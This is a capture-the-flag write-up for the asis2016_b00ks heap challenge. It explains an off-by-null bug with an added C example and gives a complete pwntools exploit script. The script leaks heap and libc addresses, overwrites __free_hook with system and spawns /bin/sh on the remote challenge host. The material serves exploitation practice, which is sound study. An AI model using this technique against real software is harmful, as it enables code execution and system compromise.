BUU practice log: asis2016_b00ks

1. The vulnerability


An off-by-null, but it is exploited differently from the usual heap challenges.

When the author name is entered, the lowest byte of the heaplist pointer can be overwritten with 0.
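To make the bug class concrete, here is an added C example (not the challenge binary's source, which this page does not show; the read loop and the struct layout are a hypothetical reconstruction). A full-length name makes the terminating NUL land one byte past the buffer, clearing the low byte of the pointer stored right after it; the fixed read reserves that byte.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical reconstruction of the b00ks name input (added example, not
 * the challenge's own code): a 32-byte name buffer is followed in memory
 * by the book-list pointer. */
struct author {
    char name[32];
    uintptr_t book_list;   /* stands in for the heaplist pointer */
};

/* Buggy read: copies up to `size` characters, then writes the terminator
 * at buf[i]. When the input fills the buffer, i == size and the NUL lands
 * one byte past the end, zeroing the low byte of whatever follows. */
static void read_name_vuln(char *buf, size_t size, const char *input)
{
    size_t i = 0;
    while (i < size && input[i] != '\0' && input[i] != '\n') {
        buf[i] = input[i];
        i++;
    }
    buf[i] = '\0';   /* off-by-null when i == size */
}

/* Fixed read: stops one byte early so the terminator always fits. */
static void read_name_fixed(char *buf, size_t size, const char *input)
{
    size_t i = 0;
    while (i + 1 < size && input[i] != '\0' && input[i] != '\n') {
        buf[i] = input[i];
        i++;
    }
    buf[i] = '\0';
}

/* Reads a 32-character name (same length as the writeup's 'a'*0x1f+'b')
 * and returns the low byte of book_list afterwards: 0x00 with the buggy
 * read, unchanged with the fixed one. */
unsigned low_byte_after_read(int use_fixed)
{
    struct author a;
    a.book_list = 0x5555555592a0ULL;   /* constructed sample heap address */
    const char *name = "aaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaab";   /* 16 + 16 chars */
    if (use_fixed)
        read_name_fixed(a.name, sizeof a.name, name);
    else
        read_name_vuln(a.name, sizeof a.name, name);
    return (unsigned)(a.book_list & 0xff);
}
```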

2. Exploitation approach

1. Leak a heap address

Allocate a large heap chunk and then free it; the show function still works, so the address leaks directly.

2. Leak libc && overwrite __free_hook

The lowest byte of the first pointer in heaplist can be overwritten with 0. Forge a structure at the corresponding location, then combine the edit and show functions to get arbitrary read/write, and change __free_hook to system.

3. Shell

Allocate a chunk with '/bin/sh\x00' written into it, then free it.

3. Exploit

```python
# Python 2 / pwntools syntax (str payloads, print statement), as in the original.
from pwn import *
p = remote('node3.buuoj.cn', 26380)
#p = process('./b00ks')
#p = process(['./b00ks'], env={"LD_PRELOAD": "./libc-2.23.so"})
elf = ELF('./b00ks')
libc = ELF('/home/root2/Desktop/buu_64/libc-2.23.so')
#libc = ELF('./libc-2.23.so')
context.log_level = 'debug'

def duan():
    # debug helper: attach gdb and pause
    gdb.attach(p)
    pause()
def add(name_size, name, content_size, content):
    p.sendlineafter('> ', '1')
    p.sendlineafter('size: ', str(name_size))
    p.sendlineafter('chars): ', name)
    p.sendlineafter('size: ', str(content_size))
    p.sendlineafter('tion: ', content)
def delete(index):
    p.sendlineafter('> ', '2')
    p.sendlineafter('delete: ', str(index))
def edit(index, content):
    p.sendlineafter('> ', '3')
    p.sendlineafter('edit: ', str(index))
    p.sendlineafter('ption: ', content)
def show():
    p.sendlineafter('> ', '4')
def change(author_name):
    p.sendlineafter('> ', '5')
    p.sendlineafter('name: ', author_name)

# a full 0x20-byte author name: this is what triggers the off-by-null
p.sendlineafter('name: ', 'a'*0x1f + 'b')
add(0xd0, 'aaaaaaaa', 0x20, 'bbbbbbbb')
show()
p.recvuntil('aaab')   # the name has no terminator, so the heap pointer is printed right after it
heap_addr = u64(p.recv(6).ljust(8, '\x00'))
print 'heap_addr-->' + hex(heap_addr)
add(0x80, 'cccccccc', 0x60, 'dddddddd')
add(0x10, 'eeeeeeee', 0x10, 'ffffffff')
delete(2)
# forge a book structure (id, name ptr, description ptr, size) inside book 1
edit(1, p64(1) + p64(heap_addr+0x30) + p64(heap_addr+0x30+0x90+0xe0+0x10) + p64(0x20))
change('a'*0x20)      # re-trigger the off-by-null so heaplist points at the forged structure
show()
libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - 88 - 0x10 - libc.symbols['__malloc_hook']
__malloc_hook = libc_base + libc.symbols['__malloc_hook']
success('libc_base:' + hex(libc_base))
free_hook = libc_base + libc.sym['__free_hook']
realloc = libc_base + libc.symbols['realloc']
system = libc_base + libc.sym['system']
edit(1, p64(free_hook) + p64(0x8))   # point the forged book's description at __free_hook
edit(3, p64(system))                 # write system into __free_hook
add(0x100, '/bin/sh\x00', 0x100, '/bin/sh\x00')
#gdb.attach(p)
delete(4)                            # free('/bin/sh') now calls system('/bin/sh')

p.interactive()
```
